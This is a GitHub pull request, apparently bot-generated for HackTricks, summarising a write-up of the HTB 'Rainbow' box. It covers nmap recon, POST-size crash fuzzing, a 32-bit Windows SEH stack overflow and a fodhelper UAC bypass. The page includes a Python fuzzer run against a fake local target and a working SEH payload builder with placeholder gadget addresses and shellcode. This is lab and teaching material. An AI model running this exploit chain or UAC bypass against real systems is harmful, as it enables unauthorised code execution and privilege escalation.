
HTB Rainbow #1349

Merged
carlospolop merged 2 commits into master from update_HTB__Rainbow_20250827_150727 on Aug 28, 2025

Conversation

@carlospolop
Collaborator

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

🎯 Content Summary

HTB Windows Host: Rainbow HTTP Service SEH Overflow to RCE

Target: HTB Windows host exposing FTP(21), HTTP(80), RPC(135/49668), NetBIOS/SMB(139/445), RDP(3389), and a custom HTTP service on 8080.


Recon

Initial port sweep and service enumeration:

nmap -p- -vvv --min-rate 10000 10.129.234.59
nmap -p 21,80,135,139,445,3389,8080,49668 -sCV 10.129.234.59

🔧 Technical Details

Crash-oriented fuzzing of custom HTTP services: When a bespoke webserver returns uniform pages and headers, fuzz POST body size and content. Watch for connection resets. A watchdog that restarts on crash (and even changes port, e.g., 8080–8090) enables rapid, safe iteration without service lockup.

SEH-based Windows stack overflow to RCE: For 32-bit Windows processes with overwritten SEH, find nSEH/SEH offsets using a cyclic pattern. Replace SEH with a module POP-POP-RET ga...

🤖 Agent Actions

Analysis and plan:

  • The blog provides detailed technical content on a 32-bit Windows SEH-based stack overflow exploit (nSEH/SEH, POP-POP-RET, short-jump into near-jump “jump-back” technique) and a Windows UAC bypass via fodhelper registry hijack. Both are highly relevant to HackTricks.
  • Repository review showed:
    • No dedicated page for Windows SEH-based exploitation in the binary-exploitation/stack-overflow section.
    • A general Windows exploitation (OSCP) page covers JMP ESP but not SEH-specific techniques.
    • UAC overview exists, but does not include a clear, step-by-step fodhelper technique. A C snippet exists elsewhere, but a procedural PS example should live in the UAC page.

What I updated/created:

  1. New page: Windows SEH-based Stack Overflow Exploitation (nSEH/SEH)
  • Path: sr...

This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

🗑️ File Cleanup

  • searchindex.js removed: This auto-generated file has been removed to prevent conflicts

The searchindex.js file is automatically generated and should not be included in manual commits.
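The crash-oriented fuzzing loop summarised in the PR body (grow the POST body, treat a reset or silence as a crash, then re-find the service after the watchdog respawns it, possibly on the next port), written out as an added example. It is not code from the original post, from 0xdf or from HackTricks. The FakeWatchdog target, its 1100-byte crash length and the 28080-28090 port range are constructed so the script runs offline; against a real host you drop the fake server and pass the real range (8080-8090 on the box).

```python
"""Crash-oriented POST fuzzing of a bespoke HTTP service behind a watchdog that
respawns the process (possibly on the next port) after each crash.  Added
example: the FakeWatchdog target, its crash length and its port range are
constructed for offline use and are not the HTB Rainbow binary."""
import socket
import threading


def build_post(host, port, body):
    """Minimal HTTP/1.1 POST with explicit Content-Length and Connection: close."""
    head = (f"POST / HTTP/1.1\r\nHost: {host}:{port}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\nConnection: close\r\n\r\n")
    return head.encode() + body


def probe(host, port, body, timeout=2.0):
    """Send one request. True if any response bytes came back; False on a reset,
    an empty close or a timeout, which is what a crashed process looks like."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_post(host, port, body))
            return bool(s.recv(4096))
    except OSError:          # refused, reset and socket.timeout all derive from OSError
        return False


def find_live_port(host, ports, timeout=0.5):
    """Scan the watchdog's candidate range and return the first port that accepts."""
    for p in ports:
        try:
            with socket.create_connection((host, p), timeout=timeout):
                return p
        except OSError:
            continue
    return None


def fuzz_lengths(host, ports, start=100, step=100, limit=5000):
    """Grow the body until the service stops answering, then re-locate it.
    Returns (crash_length, port_before, port_after); crash_length is None if
    nothing crashed within `limit`."""
    port = find_live_port(host, ports)
    for n in range(start, limit + 1, step):
        if not probe(host, port, b"A" * n):
            return n, port, find_live_port(host, ports)
    return None, port, port


class FakeWatchdog:
    """Constructed stand-in for the target: a tiny HTTP server that answers 200
    to small bodies and 'crashes' (drops the client, closes its listener and
    respawns one port higher) when the body exceeds CRASH_LEN."""
    CRASH_LEN = 1100

    def __init__(self, host, first_port):
        self.host, self.port = host, first_port
        self._spawn()

    def _spawn(self):
        sock = socket.socket()
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind((self.host, self.port))
        sock.listen(5)
        threading.Thread(target=self._loop, args=(sock,), daemon=True).start()

    def _loop(self, sock):
        while True:
            try:
                conn, _ = sock.accept()
            except OSError:          # listener closed by a "crash"
                return
            with conn:
                if self._handle(conn):
                    sock.close()     # process died; watchdog restarts on the next port
                    self.port += 1
                    self._spawn()

    def _handle(self, conn):
        """Read one request; return True if it would have crashed the process."""
        data = b""
        while b"\r\n\r\n" not in data:
            chunk = conn.recv(4096)
            if not chunk:
                return False         # bare liveness probe, client already left
            data += chunk
        head, body = data.split(b"\r\n\r\n", 1)
        clen = next((int(l.split(b":", 1)[1]) for l in head.split(b"\r\n")
                     if l.lower().startswith(b"content-length:")), 0)
        while len(body) < clen:
            chunk = conn.recv(4096)
            if not chunk:
                break
            body += chunk
        if len(body) > self.CRASH_LEN:
            return True
        conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\nConnection: close\r\n\r\nOK")
        return False


if __name__ == "__main__":
    PORTS = range(28080, 28091)   # assumed watchdog range; the box used 8080-8090
    FakeWatchdog("127.0.0.1", PORTS[0])
    print(fuzz_lengths("127.0.0.1", PORTS, start=500, step=250, limit=3000))
```

The step size trades precision for speed: once the coarse loop reports a crash at length n, rerun with `start=n-step` and `step=1` (or switch to a cyclic pattern) to pin the exact boundary, and watch `port_after` to confirm the watchdog really came back before sending the next case.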

Build master and others added 2 commits August 27, 2025 04:04
@carlospolop
Collaborator Author

🔗 Additional Context

Original Blog Post: https://0xdf.gitlab.io/2025/08/07/htb-rainbow.html

Content Categories: Based on the analysis, this content was categorized under "Windows Exploitation - SEH-based Stack Overflow (nSEH/SEH, POP-POP-RET, jump-back technique) and Windows UAC Bypass (fodhelper)".

Repository Maintenance:

  • MD Files Formatting: 874 files processed

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0
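The nSEH/SEH layout and the short-jump into near-jump "jump-back" chain that the PR summary names, as an added worked example in Python. It is not 0xdf's exploit and not code from the Rainbow service or HackTricks. `nseh_off`, the POP-POP-RET address 0x10203040 and the `\xCC` shellcode are placeholders: the real offset comes from the cyclic-pattern crash, the real address from a gadget search in a loaded module (one without SafeSEH), and the finished buffer goes in the POST body. The metasploit-style pattern helpers are reimplemented here so the block runs stand-alone.

```python
"""Layout helper for a 32-bit Windows SEH overwrite using the short-jump into
near-jump "jump-back" chain.  Added example: the offsets, the POP-POP-RET
address and the shellcode bytes are placeholders, not values from the box."""
import string
import struct


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...) of `length` bytes."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(value, length=5000):
    """Offset of the 4 bytes the debugger shows in nSEH/SEH after the crash.
    `value` is the raw bytes or the little-endian dword; -1 if not in the pattern."""
    needle = struct.pack("<I", value) if isinstance(value, int) else value
    return pattern_create(length).find(needle)


def short_jmp(rel):
    """EB rel8: relative to the end of the 2-byte instruction, range -128..127."""
    if not -128 <= rel <= 127:
        raise ValueError("short jump out of range")
    return b"\xEB" + struct.pack("<b", rel)


def near_jmp(rel):
    """E9 rel32: relative to the end of the 5-byte instruction."""
    return b"\xE9" + struct.pack("<i", rel)


def build_seh_payload(nseh_off, ppr_addr, shellcode, total_len, bad_chars=b"\x00"):
    """Buffer layout (offsets within the POST body):
         0            shellcode, NOP-padded up to the near jump
         nseh_off-5   E9 rel32     near jump back to offset 0
         nseh_off     EB F9 90 90  nSEH: short jump 7 bytes back onto the E9
         nseh_off+4   POP-POP-RET address, little-endian (SEH)
         nseh_off+8   filler so the crash length stays reproducible
    After the handler fires, POP POP RET returns into nSEH at nseh_off."""
    nj_off = nseh_off - 5
    if len(shellcode) > nj_off:
        raise ValueError("shellcode does not fit before the near jump")
    near = near_jmp(0 - nseh_off)          # target 0 minus the address after E9 rel32
    nseh = short_jmp(-7) + b"\x90\x90"     # 2 (EB F9) + 5 (E9 rel32) = 7 bytes back
    seh = struct.pack("<I", ppr_addr)
    buf = shellcode + b"\x90" * (nj_off - len(shellcode)) + near + nseh + seh
    if len(buf) > total_len:
        raise ValueError("total_len shorter than the controlled region")
    buf += b"\x90" * (total_len - len(buf))
    hit = sorted(set(bad_chars) & set(buf[:nseh_off + 8]))
    if hit:
        raise ValueError(f"bad chars in payload: {[hex(c) for c in hit]}")
    return buf


def trace_jumps(buf, start):
    """Follow EB/E9 jumps (and NOP slides) in `buf` from `start`, the offset
    POP-POP-RET lands on, and return where shellcode decoding begins."""
    off = start
    for _ in range(8):                     # guard against a looping chain
        op = buf[off]
        if op == 0xEB:
            off = off + 2 + struct.unpack("<b", buf[off + 1:off + 2])[0]
        elif op == 0xE9:
            off = off + 5 + struct.unpack("<i", buf[off + 1:off + 5])[0]
        elif op == 0x90:
            off += 1
        else:
            return off
    raise RuntimeError("jump chain did not settle")


if __name__ == "__main__":
    NSEH_OFF = pattern_offset(0x61413161)          # assumed crash value from the pattern run
    PPR = 0x10203040                               # placeholder POP-POP-RET address
    payload = build_seh_payload(100, PPR, b"\xCC" * 4, 200)
    print(NSEH_OFF, payload[95:108].hex(), trace_jumps(payload, 100))
```

`trace_jumps` is the check to run before touching the target: it decodes only the two jump encodings and confirms the chain from nSEH ends at the shellcode, so an off-by-one in either relative displacement shows up in the script rather than as a second crash in the debugger.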

@carlospolop
Collaborator Author

merge

@github-actions github-actions Bot force-pushed the master branch 5 times, most recently from 48db06e to 2918930 on August 28, 2025 18:07
@carlospolop carlospolop merged commit afcb63f into master Aug 28, 2025
@carlospolop carlospolop deleted the update_HTB__Rainbow_20250827_150727 branch August 28, 2025 20:02
github-actions Bot pushed a commit that referenced this pull request Aug 28, 2025